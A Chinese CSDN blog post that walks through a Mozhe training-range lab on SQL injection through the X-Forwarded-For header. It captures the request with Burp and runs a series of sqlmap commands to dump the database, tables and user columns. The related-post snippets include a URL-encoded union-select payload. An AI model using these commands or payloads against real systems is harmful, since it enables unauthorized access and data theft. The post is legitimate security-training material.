墨者靶场-X-Forwarded-For注入漏洞实战

最新推荐文章于 2023-07-31 17:38:03 发布
最新推荐文章于 2023-07-31 17:38:03 发布
阅读量275 收藏 1
点赞数
分类专栏: 墨者学院靶场 文章标签: mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43590351/article/details/112774170
版权

墨者靶场-X-Forwarded-For注入漏洞实战

打开靶场出现后台管理登录界面,随便输入一个用户名密码
利用Burp进行拦截抓包
在这里插入图片描述
在XFF字段的后面加上*,复制数据包到本地并保存为1.txt文档
放入到Sqlmap中进行自动化探测
爆破数据库

sqlmap.py -r 1.txt --dbs --batch

在这里插入图片描述
爆破表

sqlmap.py -r 1.txt -D webcalendar --tables --batch

在这里插入图片描述
爆破字段

sqlmap.py -r 1.txt -D webcalendar -T user --columns --batch

在这里插入图片描述
爆破字段内容
在这里插入图片描述
登陆后台即可拿到key

萌新_大鹏鸟
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
墨者靶场 初级:X-Forwarded-For注入漏洞实战
qq_43233085的博客
01-11 602
初级:X-Forwarded-For注入漏洞实战题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 某业务系统,安全工程师"墨者"进行授权黑盒测试,系统的业主单位也没有给账号密码,怎么测? 实训目标 1、掌握SQL注入的基本原理; 2、了解服务器获取客户端IP的方式; 3、了解SQL注入的工具使用; 解题方向 对登录表单的各参数进行测试,找到SQL注入点,对数据库内容进行读取,找到账号与密码。...
墨者靶场 post ,DB2,绕过登录,sql注入四关
最新发布
07-22
通关攻略墨者靶场 post ,DB2,绕过登录,sql注入四关
01#墨者靶场-X-Forwarded-For注入漏洞实战
shy的博客
11-15 696
墨者学习01 By/shy014 1.在网站登陆处抓包,发现提示IP已被记录。...
墨者 - X-Forwarded-For注入漏洞实战
qq_24481913的博客
07-31 407
X-Forwarded-For:简称XFF头,代表了HTTP的请求端真实的IP。它被认为是客户端通过HTTP代理或者负载均衡器连接到web服务端获取源ip地址的一个标准(通常一些网站的防注入功能会记录请求端真实IP地址并写入数据库或某文件[通过修改XXF头可以实现伪造IP])。XFF,是X-Forwarded-for的缩写,属于SQL注入的一种,该注入原理是通过修改X-Forwarded-for头对带入系统的dns进行sql注入,达到欺骗服务器执行恶意的SQL命令的效果,从而可以得到网站的数据库内容。
墨者】X-Forwarded-For注入漏洞实战
weixin_48621644的博客
09-11 1291
小羊学安全 任重而道远 ~
墨者学院-X-Forwarded-For注入漏洞实战
JimWu的博客
09-05 356
X-Forwarded-For注入漏洞实战 难易程度:★★ 题目类型:SQL注入 使用工具:FireFox浏览器、kali 1.打开靶场,使用burpsuite,登录,截包。 send to repeater,在下方加入一句X-Forward-For:*,右键save item,导出文件。 2.打开kali,使用sqlmap爆库名。 输入sqlmap -r 1.txt --current-db ...
墨者学院】X-Forwarded-For注入漏洞实战
yoyoko_chan的博客
07-28 401
背景介绍  某业务系统,安全工程师"墨者"进行授权黑盒测试,系统的业主单位也没有给账号密码,怎么测? 实训目标  1、掌握SQL注入的基本原理;  2、了解服务器获取客户端IP的方式;  3、了解SQL注入的工具使用; 解题方向  对登录表单的各参数进行测试,找到SQL注入点,对数据库内容进行读取,找到账号与密码。 0x00  学学sqlmap。 0x01  进入靶场,是一个后台管理系统,但什么信息也没给,随便输点儿东西,但只会弹窗  直接Burpsuite抓包,发现弹窗的是IP地址  结合题目构造一下
漏洞操作记录—— X-Forwarded-For 注入漏洞实战
chick11的博客
07-07 855
墨者学院 X-Forwarded-For 注入漏洞实战——解题思路 打开漏洞靶场链接 随便输入账号密码点击登录 出现弹窗 弹窗显示IP地址 用burp抓一个包看看 流量包中发现X -forwarded-for: 缺失 把抓到的包发送到repeater中,在请求头中增加X-Forwarded-For: ' 发现报错 还可改为127.0.0.1' 尝试用字符看看能不能闭合 尝试闭合成功,很明显常见字符型注入 尝试爆数据库 库database..
[ 墨者学院 ] SQL注入 —— X-Forwarded-For注入漏洞实战
weixin_30843605的博客
06-27 441
0x00.题目描述: 背景介绍 某业务系统,安全工程师"墨者"进行授权黑盒测试,系统的业主单位也没有给账号密码,怎么测? 实训目标 1、掌握SQL注入的基本原理;2、了解服务器获取客户端IP的方式;3、了解SQL注入的工具使用; 解题方向 对...
墨者学院在线靶场--WEB安全--SQL注入
m0_59022585的博客
07-09 1156
测试注入禁用password,注入-1+%75nion+%73elect+1,%64atabase(),(%73elect+group_concat(%70%61%73%73%77%6f%72%64)+%66rom+%73%74%6f%72%6d%67%72%6f%75%70%5f%6d%65%6d%62%65%72),4回显得到三个MD5加密的密码。
APP原型实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
0080 APP原型实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原型源文件
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)
墨者安全软件-免费杀毒软件
11-11
墨者安全专家是一款永久免费的免疫型安全防护软件,集墨者独创的 “革离术”、终身免费杀毒、修复系统漏洞、上网痕迹清理、网络防火墙、系统实时保护、安全互助社区等强大功能于一身。特别是独创的“革离术”,利用...
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
11-13
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
第30天:WEB漏洞-RCE代码及命令执行漏洞全解1
08-03
1. **墨者靶场**:提供了黑盒和白盒环境下的命令执行与代码执行漏洞模拟,帮助测试和学习漏洞利用和防御。 2. **Javaweb-Struts2框架类RCE漏洞**:Struts2框架中的某些版本存在远程代码执行漏洞,通过精心构造的请求...
mogan-main.zip
12-28
墨干编辑器是一款由墨者实验室开发的高效结构化编辑器,专为科技领域的爱好者和专业人士设计,旨在提升文本编辑、代码编写以及排版工作的体验。这款应用工具集成了多种功能,包括文本编辑、代码编辑器和排版软件,...
memcached所需要的jar包---tomcat8.0
08-08
Memcached是一种高性能、分布式内存对象缓存系统,用于在分布式计算环境中存储临时数据,以减少对数据库的访问压力。在Web应用中,特别是在使用Java技术栈的Tomcat服务器上,Memcached常被用来实现session共享,提高...
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究...总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值